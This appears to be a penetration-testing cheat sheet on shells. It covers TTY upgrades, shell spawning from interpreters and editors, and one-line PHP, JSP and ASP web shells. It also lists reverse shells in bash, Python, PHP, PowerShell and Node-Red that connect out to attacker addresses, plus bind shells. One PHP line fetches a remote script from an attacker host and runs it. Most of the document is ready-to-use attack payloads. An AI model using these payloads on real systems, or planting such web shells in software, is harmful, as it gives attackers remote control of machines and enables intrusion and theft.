Shells/TTYs

Teletypewriters

Get a Full TTY

BASH

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

2. CTRL+Z

3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

1. python3 -c 'import pty; pty.spawn("/bin/bash")'

2. CTRL+Z

3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Change the env to xterm

export TERM=xterm

Terminal Size

Check your terminal size

stty size

Now, change it in the target

stty rows <NUMBER> columns <NUMBER>

Use arrow-keys

Just use it

bash

Turn history on

set -o history

• In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example

rlwrap nc -lvnp <port>

Connection example

rlwrap nc 10.10.10.131 6200

Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")' 

The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

Also is possible to use echo to pass Python os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash') 

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'

Spawn the shell directly

perl: exec "/bin/sh";

Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

Used to execute an external shell command:

:!bash

Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

Print the working directory

getcwd()

Print the current user

get_current_user()

Print system info

phpinfo()

Print contents from directory

scandir("/home")

Print content from file

file_get_contents("/etc/os-release")

Web Shells

PHP Shell

<?php system($_REQUEST['cmd']); ?>

Create a web shell file

echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php

JSP - Java Server Pages

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP - Active Server Pages

<% eval request("cmd") %>

BASH Reverse Shells

Standard

bash -i >& /dev/tcp/10.10.14.18/1337 0>&1

URL

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

URL Encoded

rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f

Run it in the background

nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &

Python Reverse Shells

Interactive / PTY Shell

One-liner IPv4

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Save in a file IPv4

echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

Dumb Shell using subprocess

One-liner IPv4

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Save it in a file IPv4

echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py

Can also use curl

curl http://SITE.com/shell.php --data-urlencode "cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

UDP Reverse shell

import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()

PHP Reverse shell

Direct reverse shell

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.17/4444 0>&1'");?>

Remote reverse shell

<?php system("curl http://attacker_ip/reverseshell | bash"); ?>

FIFO

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <Port> >/tmp/f"); ?>

Powershell Reverse shell

One-line Reverse TCP shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

From PHP WebShell

curl -G "http://10.10.10.9/shell.php" --data-urlencode "cmd=powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('10.10.14.23',4321);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""

Node-Red Reverse shell

Import it

[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"10.10.14.126","port":"9999","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]

• Once you received the connection use another listener you get a more stable shell:

bash -c "bash -i > /dev/tcp/10.10.14.172/3000 0>&1" &

• Then use script:

script -qc /bin/bash /dev/null

Bind Shells

• First, find ports were inbound connections are allowed:

Linux

ss -tuln
netstat -tuln
lsof -i -n

netstat -ano | findstr "LISTEN"
Get-Process | Where-Object {$_.Id -eq (Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}).OwningProcess}

Check the firewall rules in Windows:

netsh advfirewall firewall show rule name=all

Python Shell

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

GitHub - Arrexel/phpbash: A semi-interactive PHP shell compressed into a single file.GitHub